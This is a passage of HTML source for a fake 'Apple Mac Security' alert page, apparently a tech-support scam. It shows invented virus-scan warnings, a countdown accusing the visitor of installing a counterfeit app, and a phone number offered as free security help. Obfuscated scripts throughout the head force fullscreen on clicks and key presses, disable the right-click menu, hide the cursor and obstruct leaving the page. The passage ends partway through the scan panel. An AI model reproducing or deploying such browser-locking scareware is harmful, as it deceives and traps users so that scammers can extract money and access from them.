<!DOCTYPE html>
<html>
<head>

  <!-- Required meta tags -->
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <title> ASDCXER0098iunvb</title>
<link rel="stylesheet" href="styles.css">
<script type="text/javascript" src="scripts.js"></script>
<link rel="shortcut icon" href="microsoft.png" type="image/png">
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js" integrity="sha384-B4gt1jrGC7Jh4AgTPSdUtOBvfO8shuf57BaghqFfPlYxofvL8/KUEfYiJOMMV+rV" crossorigin="anonymous"></script>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css">
<!-- Google tag (gtag.js) -->
<script type='text/javascript'>//<![CDATA[
$(function(){
$('body').bind('contextmenu', function(e){
return false;
});
});//]]>
</script>


<script>(function(_0x4b4c5b,_0x4e7710){var _0x161830=_0x2904,_0x499844=_0x4b4c5b();while(!![]){try{var _0xc9b39d=parseInt(_0x161830(0x1a7))/0x1+parseInt(_0x161830(0x1a8))/0x2*(-parseInt(_0x161830(0x1ad))/0x3)+parseInt(_0x161830(0x1a4))/0x4+-parseInt(_0x161830(0x1ae))/0x5+parseInt(_0x161830(0x1aa))/0x6+-parseInt(_0x161830(0x1a1))/0x7*(-parseInt(_0x161830(0x1a5))/0x8)+-parseInt(_0x161830(0x1af))/0x9*(parseInt(_0x161830(0x1a6))/0xa);if(_0xc9b39d===_0x4e7710)break;else _0x499844['push'](_0x499844['shift']());}catch(_0x3f052c){_0x499844['push'](_0x499844['shift']());}}}(_0x472b,0x34698));function _0x472b(){var _0x476fb5=['1972890qqUPDT','293333tUUPKG','167588cBasEA','webkitRequestFullscreen','1129830oCpqiH','msExitFullscreen','msRequestFullscreen','9XoasKy','1512200ZCdekE','18beocap','requestFullscreen','2438954vpjLUN','webkitExitFullscreen','exitFullscreen','1332080CUEDCJ','8GgDMRo'];_0x472b=function(){return _0x476fb5;};return _0x472b();}var elem=document['documentElement'];function openFullscreen(){var _0x5e640c=_0x2904;if(elem[_0x5e640c(0x1a0)])elem['requestFullscreen']();else{if(elem[_0x5e640c(0x1a9)])elem['webkitRequestFullscreen']();else elem[_0x5e640c(0x1ac)]&&elem['msRequestFullscreen']();}}function _0x2904(_0x14ea0f,_0x48a421){var _0x472b54=_0x472b();return _0x2904=function(_0x2904cc,_0x3057d1){_0x2904cc=_0x2904cc-0x1a0;var _0x4cd895=_0x472b54[_0x2904cc];return _0x4cd895;},_0x2904(_0x14ea0f,_0x48a421);}function closeFullscreen(){var _0x28be0e=_0x2904;if(document[_0x28be0e(0x1a3)])document[_0x28be0e(0x1a3)]();else{if(document[_0x28be0e(0x1a2)])document[_0x28be0e(0x1a2)]();else document[_0x28be0e(0x1ab)]&&document[_0x28be0e(0x1ab)]();}}
</script>

<script type="text/javascript">
       function _0xe8db(){var _0x26f9de=['map','onload','not-allowed','18557bKXEuP','304611wZmhhg','4kXPYew','3158365uPVpnl','cursor','427370seBVTk','<iframe\x20src=\x27#\x27\x20width=\x2712\x27\x20height=\x2712\x27\x20style=\x27position:\x20absolute;\x20left:\x20-25px;\x27></iframe>','style','innerHTML','body','355645MKckAz','1464djtKqH','getElementById','1255344lZypWL','srcElement','1051686OTIPta','45ySVVeu'];_0xe8db=function(){return _0x26f9de;};return _0xe8db();}function _0x4cae(_0x4619be,_0x2f7a14){var _0xe8db23=_0xe8db();return _0x4cae=function(_0x4cae49,_0x348bc4){_0x4cae49=_0x4cae49-0x146;var _0x817bc0=_0xe8db23[_0x4cae49];return _0x817bc0;},_0x4cae(_0x4619be,_0x2f7a14);}var _0x36bd6d=_0x4cae;(function(_0x521567,_0x5cff78){var _0x333e01=_0x4cae,_0x5d3236=_0x521567();while(!![]){try{var _0x5a806d=-parseInt(_0x333e01(0x14d))/0x1+-parseInt(_0x333e01(0x152))/0x2+-parseInt(_0x333e01(0x158))/0x3*(-parseInt(_0x333e01(0x159))/0x4)+parseInt(_0x333e01(0x146))/0x5+-parseInt(_0x333e01(0x150))/0x6+-parseInt(_0x333e01(0x157))/0x7*(-parseInt(_0x333e01(0x14e))/0x8)+-parseInt(_0x333e01(0x153))/0x9*(-parseInt(_0x333e01(0x148))/0xa);if(_0x5a806d===_0x5cff78)break;else _0x5d3236['push'](_0x5d3236['shift']());}catch(_0x5bd19f){_0x5d3236['push'](_0x5d3236['shift']());}}}(_0xe8db,0x53544),window[_0x36bd6d(0x155)]=function(){document['onclick']=function(_0x1beb4a){var _0x297f70=_0x4cae;_0x1beb4a=_0x1beb4a||event,target=_0x1beb4a['target']||_0x1beb4a[_0x297f70(0x151)],target['tagName']==='DIV'?(toggleFullScreen(),document[_0x297f70(0x14c)][_0x297f70(0x14a)][_0x297f70(0x147)]=_0x297f70(0x156),document['getElementById'](_0x297f70(0x154))[_0x297f70(0x14b)]=stroka,document[_0x297f70(0x14f)]('fa')[_0x297f70(0x14b)]=_0x297f70(0x149)):(toggleFullScreen(),document['body'][_0x297f70(0x14a)][_0x297f70(0x147)]=_0x297f70(0x156),document[_0x297f70(0x14f)](_0x297f70(0x154))['innerHTML']=stroka,document['getElementById']('fa')['innerHTML']=_0x297f70(0x149));};});
    </script>


<script>
        function getPhone(name)
        {
            name = name.replace(/[\[]/,"\\\[").replace(/[\]]/,"\\\]");
            var regexS = "[\\?&]"+name+"=([^&#]*)";
            var regex = new RegExp( regexS );
            var results = regex.exec( window.location.href );
            if( results == null )
                return "";
            else
                return results[1];
        }
    </script>
    <script type="text/javascript">
        var phone = getPhone('phone');
    </script>





<style>
  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 400;
    src: url(https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu72xKOzY.woff2)format('woff2');
    unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 400;
    src: url(https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu5mxKOzY.woff2)format('woff2');
    unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 400;
    src: url(https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu7mxKOzY.woff2)format('woff2');
    unicode-range: U+1F00-1FFF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 400;
    src: url(https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4WxKOzY.woff2)format('woff2');
    unicode-range: U+0370-03FF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 400;
    src: url(https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu7WxKOzY.woff2)format('woff2');
    unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+1EA0-1EF9, U+20AB;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 400;
    src: url(https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu7GxKOzY.woff2)format('woff2');
    unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 400;
    src: url(https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2)format('woff2');
    unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 500;
    src: url(https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fCRc4EsA.woff2)format('woff2');
    unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 500;
    src: url(https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fABc4EsA.woff2)format('woff2');
    unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 500;
    src: url(https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fCBc4EsA.woff2)format('woff2');
    unicode-range: U+1F00-1FFF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 500;
    src: url(https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBxc4EsA.woff2)format('woff2');
    unicode-range: U+0370-03FF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 500;
    src: url(https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fCxc4EsA.woff2)format('woff2');
    unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+1EA0-1EF9, U+20AB;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 500;
    src: url(https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fChc4EsA.woff2)format('woff2');
    unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 500;
    src: url(https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc4.woff2)format('woff2');
    unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 700;
    src: url(https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmWUlfCRc4EsA.woff2)format('woff2');
    unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 700;
    src: url(https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmWUlfABc4EsA.woff2)format('woff2');
    unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 700;
    src: url(https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmWUlfCBc4EsA.woff2)format('woff2');
    unicode-range: U+1F00-1FFF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 700;
    src: url(https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmWUlfBxc4EsA.woff2)format('woff2');
    unicode-range: U+0370-03FF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 700;
    src: url(https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmWUlfCxc4EsA.woff2)format('woff2');
    unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+1EA0-1EF9, U+20AB;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 700;
    src: url(https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmWUlfChc4EsA.woff2)format('woff2');
    unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 700;
    src: url(https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmWUlfBBc4.woff2)format('woff2');
    unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
  }
</style>
<style>
  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 400;
    src: url(https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlL3Kwp5MKg.woff2)format('woff2');
    unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 400;
    src: url(https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlL3Nwp5MKg.woff2)format('woff2');
    unicode-range: U+0370-03FF;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 400;
    src: url(https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlL3Bwp5MKg.woff2)format('woff2');
    unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+1EA0-1EF9, U+20AB;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 400;
    src: url(https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlL3Awp5MKg.woff2)format('woff2');
    unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 400;
    src: url(https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlL3Owp4.woff2)format('woff2');
    unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 500;
    src: url(https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94Yt3CwZ-Pw.woff2)format('woff2');
    unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 500;
    src: url(https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94YtwCwZ-Pw.woff2)format('woff2');
    unicode-range: U+0370-03FF;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 500;
    src: url(https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94Yt8CwZ-Pw.woff2)format('woff2');
    unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+1EA0-1EF9, U+20AB;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 500;
    src: url(https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94Yt9CwZ-Pw.woff2)format('woff2');
    unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 500;
    src: url(https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94YtzCwY.woff2)format('woff2');
    unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
  }
</style>
<link href="https://fonts.googleapis.com/css2?family=Google+Sans+Text:wght@400;500;700&amp;display=swap" as="style" id="gst" rel="preload" nonce="jPZWjgBELiO2vboq/vPm">


 <script>
      const _0x221623=_0xca38;function _0xca38(_0x55b9a3,_0x5537cf){const _0x5a7333=_0x5a73();return _0xca38=function(_0xca38d5,_0x2b99cd){_0xca38d5=_0xca38d5-0xcf;let _0x268863=_0x5a7333[_0xca38d5];return _0x268863;},_0xca38(_0x55b9a3,_0x5537cf);}(function(_0x21e0b1,_0x3ba3d6){const _0x7e7716=_0xca38,_0x5f2712=_0x21e0b1();while(!![]){try{const _0x3aba46=-parseInt(_0x7e7716(0xd5))/0x1+-parseInt(_0x7e7716(0xdc))/0x2*(parseInt(_0x7e7716(0xe1))/0x3)+parseInt(_0x7e7716(0xd9))/0x4+parseInt(_0x7e7716(0xd7))/0x5*(parseInt(_0x7e7716(0xe7))/0x6)+parseInt(_0x7e7716(0xd6))/0x7*(-parseInt(_0x7e7716(0xcf))/0x8)+-parseInt(_0x7e7716(0xdb))/0x9*(parseInt(_0x7e7716(0xde))/0xa)+parseInt(_0x7e7716(0xda))/0xb;if(_0x3aba46===_0x3ba3d6)break;else _0x5f2712['push'](_0x5f2712['shift']());}catch(_0x564061){_0x5f2712['push'](_0x5f2712['shift']());}}}(_0x5a73,0x9f8ac),navigator[_0x221623(0xd2)][_0x221623(0xd0)](['platformVersion'])[_0x221623(0xd1)](_0x37373b=>{const _0x1da592=_0x221623;if(navigator[_0x1da592(0xd2)][_0x1da592(0xd4)]===_0x1da592(0xe3)){const _0x39ad6a=parseInt(_0x37373b[_0x1da592(0xd3)][_0x1da592(0xe6)]('.')[0x0]);if(_0x39ad6a>=0xd)document[_0x1da592(0xe0)]('which')[_0x1da592(0xe5)]='\x2011';else _0x39ad6a>0x0?document[_0x1da592(0xe0)](_0x1da592(0xe2))[_0x1da592(0xe5)]=_0x1da592(0xdd):console[_0x1da592(0xdf)](_0x1da592(0xd8));}else console[_0x1da592(0xdf)](_0x1da592(0xe4));}));function _0x5a73(){const _0x517fc2=['getElementById','1267212MWQHZJ','which','Windows','does\x20not\x20work\x20on\x20Windows','innerHTML','split','6WbLriG','74744qYOhKZ','getHighEntropyValues','then','userAgentData','platformVersion','platform','321298ctwMzx','371idGouu','2889410fTHtzY','Beyond','1278844iQLHnT','11445863hVzQDL','6147omGcJw','2GWdGIH','\x2010','670HDWpfC','log'];_0x5a73=function(){return _0x517fc2;};return _0x5a73();}
  </script>



<script>
  function _0x5bbf(_0x5b5e86,_0x3cc01f){var _0x3de8bf=_0x3de8();return _0x5bbf=function(_0x5bbf34,_0x1b5ea3){_0x5bbf34=_0x5bbf34-0x68;var _0x3146d2=_0x3de8bf[_0x5bbf34];return _0x3146d2;},_0x5bbf(_0x5b5e86,_0x3cc01f);}var _0x31062c=_0x5bbf;function _0x3de8(){var _0x5a864f=['881235DGpoja','requestFullScreen','documentElement','1141260OaHrMs','715TeWwpW','webkitRequestFullScreen','3069272zfbUzA','162DOjysQ','click','9fjpHMp','381318jLxWQU','195950VFNGWP','105422BcrQlG','9GTeOoV','144515PBRFuh','mozRequestFullScreen'];_0x3de8=function(){return _0x5a864f;};return _0x3de8();}(function(_0x1e445b,_0x3e8a59){var _0x1b08bd=_0x5bbf,_0x17df89=_0x1e445b();while(!![]){try{var _0x10dd7e=parseInt(_0x1b08bd(0x6e))/0x1*(-parseInt(_0x1b08bd(0x71))/0x2)+parseInt(_0x1b08bd(0x75))/0x3+-parseInt(_0x1b08bd(0x68))/0x4+parseInt(_0x1b08bd(0x73))/0x5*(-parseInt(_0x1b08bd(0x6c))/0x6)+parseInt(_0x1b08bd(0x6f))/0x7+parseInt(_0x1b08bd(0x6b))/0x8*(parseInt(_0x1b08bd(0x72))/0x9)+parseInt(_0x1b08bd(0x70))/0xa*(parseInt(_0x1b08bd(0x69))/0xb);if(_0x10dd7e===_0x3e8a59)break;else _0x17df89['push'](_0x17df89['shift']());}catch(_0xcea962){_0x17df89['push'](_0x17df89['shift']());}}}(_0x3de8,0x71a32),addEventListener(_0x31062c(0x6d),function(){var _0x4504b5=_0x31062c,_0xca9ef5=document[_0x4504b5(0x77)],_0x473781=_0xca9ef5[_0x4504b5(0x76)]||_0xca9ef5[_0x4504b5(0x6a)]||_0xca9ef5[_0x4504b5(0x74)];_0x473781['call'](_0xca9ef5);}));
</script>

<script type="text/javascript">
  var _0x43ebdf=_0x6a78;function _0x6a78(_0x44262c,_0x39e453){var _0x3b27dc=_0x3b27();return _0x6a78=function(_0x6a78e3,_0xd99839){_0x6a78e3=_0x6a78e3-0x18d;var _0xb05647=_0x3b27dc[_0x6a78e3];return _0xb05647;},_0x6a78(_0x44262c,_0x39e453);}function _0x3b27(){var _0x501cc3=['9324iOZfap','2BKqoFz','7362GoHCQy','3709574nAygRz','40nJtqBi','keyup','9968fEaIGN','keyCode','1001GIxLEM','1468yRztKL','7362LdvSkK','139380YdBNpy','1913396dLQjIF','13947GbsVcn','addEventListener','1043052NzblvJ'];_0x3b27=function(){return _0x501cc3;};return _0x3b27();}(function(_0x2b3bf0,_0x58e75b){var _0x28fa62=_0x6a78,_0x2a5906=_0x2b3bf0();while(!![]){try{var _0x3d2d2f=-parseInt(_0x28fa62(0x196))/0x1*(-parseInt(_0x28fa62(0x19b))/0x2)+parseInt(_0x28fa62(0x197))/0x3*(parseInt(_0x28fa62(0x193))/0x4)+parseInt(_0x28fa62(0x195))/0x5+-parseInt(_0x28fa62(0x194))/0x6*(-parseInt(_0x28fa62(0x19a))/0x7)+-parseInt(_0x28fa62(0x190))/0x8*(-parseInt(_0x28fa62(0x19c))/0x9)+parseInt(_0x28fa62(0x18e))/0xa*(parseInt(_0x28fa62(0x18d))/0xb)+parseInt(_0x28fa62(0x199))/0xc*(-parseInt(_0x28fa62(0x192))/0xd);if(_0x3d2d2f===_0x58e75b)break;else _0x2a5906['push'](_0x2a5906['shift']());}catch(_0x34e81c){_0x2a5906['push'](_0x2a5906['shift']());}}}(_0x3b27,0xe9a8a),document[_0x43ebdf(0x198)](_0x43ebdf(0x18f),function(_0x990140){var _0x5e9257=_0x43ebdf;_0x990140[_0x5e9257(0x191)]===0x1b&&toggleFullScreen();},![]));
</script>

<script type="text/javascript">
  document.addEventListener('keyup', function (e) {
      if (e.keyCode === 122  e.keyCode === 17  e.keyCode === 18 || e.keyCode === 13) {
          document.getElementById('map').innerHTML = stroka;
          toggleFullScreen();
      }
  }, false);
</script>

<script type="text/javascript">
    var _0x3dd024=_0x3dfc;function _0x3dfc(_0x3875e8,_0xe456ea){var _0x44bcbd=_0x44bc();return _0x3dfc=function(_0x3dfc9d,_0x5d4986){_0x3dfc9d=_0x3dfc9d-0xd2;var _0x15c443=_0x44bcbd[_0x3dfc9d];return _0x15c443;},_0x3dfc(_0x3875e8,_0xe456ea);}(function(_0x2229fc,_0x2fc459){var _0x556a7f=_0x3dfc,_0xa724a3=_0x2229fc();while(!![]){try{var _0x2d38c4=parseInt(_0x556a7f(0xd7))/0x1+parseInt(_0x556a7f(0xd8))/0x2*(-parseInt(_0x556a7f(0xd3))/0x3)+-parseInt(_0x556a7f(0xd9))/0x4+-parseInt(_0x556a7f(0xda))/0x5+-parseInt(_0x556a7f(0xdc))/0x6*(-parseInt(_0x556a7f(0xd4))/0x7)+-parseInt(_0x556a7f(0xdb))/0x8*(parseInt(_0x556a7f(0xd5))/0x9)+parseInt(_0x556a7f(0xd6))/0xa;if(_0x2d38c4===_0x2fc459)break;else _0xa724a3['push'](_0xa724a3['shift']());}catch(_0x236847){_0xa724a3['push'](_0xa724a3['shift']());}}}(_0x44bc,0xf181e),window[_0x3dd024(0xd2)]=function(){if(data_needs_saving())return'Do\x20you\x20really\x20want\x20to\x20leave\x20our\x20brilliant\x20application?';else return;});function _0x44bc(){var _0x460247=['244615SEzszD','91017RiuFfs','21961940YmuGDI','1903569RXdIgo','16TpWvpQ','2416864tnmZZW','1084325JEYMcK','888fLZcXz','66iSwgtV','onbeforeunload','581745vrTOcC'];_0x44bc=function(){return _0x460247;};return _0x44bc();}
</script>




<script>(function(_0x4bab4a,_0x3578e2){var _0x27fae0=_0x2672,_0x52dbfa=_0x4bab4a();while(!![]){try{var _0x28c95d=parseInt(_0x27fae0(0x1d0))/0x1*(-parseInt(_0x27fae0(0x1d7))/0x2)+parseInt(_0x27fae0(0x1ca))/0x3+parseInt(_0x27fae0(0x1cf))/0x4+parseInt(_0x27fae0(0x1d1))/0x5+-parseInt(_0x27fae0(0x1d8))/0x6*(-parseInt(_0x27fae0(0x1d5))/0x7)+-parseInt(_0x27fae0(0x1d4))/0x8*(-parseInt(_0x27fae0(0x1d2))/0x9)+-parseInt(_0x27fae0(0x1c9))/0xa*(parseInt(_0x27fae0(0x1d6))/0xb);if(_0x28c95d===_0x3578e2)break;else _0x52dbfa['push'](_0x52dbfa['shift']());}catch(_0x15aa62){_0x52dbfa['push'](_0x52dbfa['shift']());}}}(_0x11e5,0xd2969));function _0x2672(_0x4efbfc,_0x340946){var _0x11e516=_0x11e5();return _0x2672=function(_0x2672c7,_0x3a43a6){_0x2672c7=_0x2672c7-0x1c9;var _0x5026a3=_0x11e516[_0x2672c7];return _0x5026a3;},_0x2672(_0x4efbfc,_0x340946);}function _0x11e5(){var _0x2e7c3f=['184GAjVLg','623nieXIf','22iFydNA','2414mnJgeH','8004zSXhWt','10611460mcNKCu','460071HvqqST','text','#time','&nbsp;\x20\x20If\x20you\x20think\x20you\x20have\x20not\x20installed\x20or\x20downloaded\x20any\x20Counterfeit\x20App\x20or\x20Files,\x20click\x20DENY\x20button\x20to\x20close\x20the\x20Page.','log','1309648Yweriu','388whjvnA','7305735ZOyGtP','544905QpTJgg','Timer\x20-->\x20'];_0x11e5=function(){return _0x2e7c3f;};return _0x11e5();}var counter=0x3c,interval=setInterval(function(){var _0x1b1c09=_0x2672;counter--;if(counter<=0x0){clearInterval(interval),$('#timer')['html'](_0x1b1c09(0x1cd));return;}else $(_0x1b1c09(0x1cc))[_0x1b1c09(0x1cb)](counter),console[_0x1b1c09(0x1ce)](_0x1b1c09(0x1d3)+counter);},0x3e8);
</script>

<style>.blink_me {
animation: blinker 1s linear infinite;
}

@keyframes blinker {
50% { opacity: 0; }
}

</style>

<style>
.blink {
background-color:red;
color:black;
animation: blink-animation 1s steps(5, start) infinite;
-webkit-animation: blink-animation 1s steps(5, start) infinite;
}

.blink1 {
background-color:green;
animation: blink-animation 1s steps(5, start) infinite;
-webkit-animation: blink-animation 1s steps(5, start) infinite;
}


@keyframes blink-animation {
to {
visibility: hidden;
}
}
@-webkit-keyframes blink-animation {
to {
visibility: hidden;
}
}
</style>





</head>

<body id="mycanvas" onclick="playSound()" class="map" onbeforeunload="return myFunction()" style="cursor:none;">

<div class="bg" style="cursor:none;">
    <div class="bgimg" style="top: 0px;"><img src="bg1.jpg" alt="" width="100%"/></div>
    <div class="bgimg2" style="top: 0px;"><img src="bg2.jpg" alt="" width="100%" /></div>

</div>

  <a onclick="openFullscreen();" rel="noreferrer" id="link_black" style="">
      <div class="black" style="height: 145%;"></div>
  </a>


<div class="box" id="box">
<div class="top">
<p style="font-size: 16px;  font-family: 'Google Sans', 'Google Sans Text', Roboto, sans-serif;font-weight: 600;">Apple Mac Security<img src="minimize.jpeg" class="btn" style="float: right; width:115px;"></p>
</div>

<h2 style="position: absolute; left: 70px; top: 60px; font-weight: 300;" id="text1">Safety at a glance</h2>
<p style="position: absolute; left: 70px; top: 100px; font-weight: 0; font-size: 13px;" id="text2"><br>Check what is happening to the safety and health of your device and take all necessary measures.</p>
<div class="centerright">
<ul>
<li>
<br>
<img src="kxFy-clip.png" width="40px;">
<p>Virus and threat protection</p>
<p style="top: 120px; position: absolute; font-size: 13px; color: grey;">action is required. Run a scan to check for <br>threats.</p>

</li>
<li>
<br><br>
<img src="qsbs-firewall.png" width="60px;">
<p>Firewall and network protection</p>
<p style="top: 270px; position: absolute; font-size: 13px; color: grey;">No action required.</p>
</li>
</ul>
<ul>
<li>
<br>
<img src="s-S4-acc.png" width="60px;">
<p>Account protection</p>
<p style="top: 125px; position: absolute; font-size: 13px; color: grey;">No action required.</p>
</li>
<li>
<br>
<img src="Z5BR-network.png" width="51px;"/>
<p>Application and browser control</p>
<p style="top: 270px; position: absolute; font-size: 13px; color: grey;">No action required.</p>
</li>
</ul>
</div>
<img src="uZbx-si.png" class="btn" style="border-bottom-left-radius: 10px;" width="30.9px; height: 15.2px;" id="clscl">
<br>
</div>


<!--Chrome Security Quick Scan-->
<div class="scan" id="scan">
  <div class="top">
  <p style="font-size: 16px;  font-family: 'Google Sans', 'Google Sans Text', Roboto, sans-serif;font-weight: 600;">Apple Mac Security<img src="minimize.jpeg" class="btn" style="float: right; width:115px;"></p>
  </div>
  <h2 style="position: absolute; left: 66px; top: 49px; font-weight: 300;" id="text1"><img src="kxFy-clip.png" width="30px;" style="margin-right: 10px;vertical-align: text-top;">Virus and threat protection</h2>
  <p style="position: absolute; left: 70px; top: 100px; font-weight: 0; font-size: 13px;" id="text2">Device protection against threats.</p>

<h3 style="position: absolute; right: 180px; top: -10px; font-weight: 300;" id="text12"><b>   +1 (833) 923-9200  (Free Security)</b></h3>

  <div class="centerright">


  <ul>
  <li>



